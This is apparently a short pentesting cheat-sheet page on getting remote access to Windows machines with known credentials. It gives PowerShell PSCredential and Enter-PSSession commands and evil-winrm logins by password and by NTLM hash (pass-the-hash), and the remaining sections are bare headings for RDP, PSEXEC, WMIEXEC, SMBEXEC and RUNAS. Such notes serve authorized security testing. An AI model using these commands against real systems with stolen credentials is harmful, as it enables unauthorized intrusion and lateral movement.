Access

How to get into a system if you have creds

WinRM

Regular

Here are 3 commands:

  1. Converting our password to secure string

  2. Putting password secure string and username into $cred object

  3. Using $cred for authentication

PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force

PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password)

PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred

Evil-WinRM

evil-winrm -i 13.13.13.13 -u venator17 -p S3cr3t!

evil-winrm -i 13.13.13.13 -u 'administrator' -H 'blahblahsupersecretnthash'

RDP

Rdesktop

Xfreerdp

Regular

With Port-Forwarding

Mounting a local dir

Remmina (GUI)

PSEXEC

WMIEXEC

SMBEXEC

RUNAS

Last updated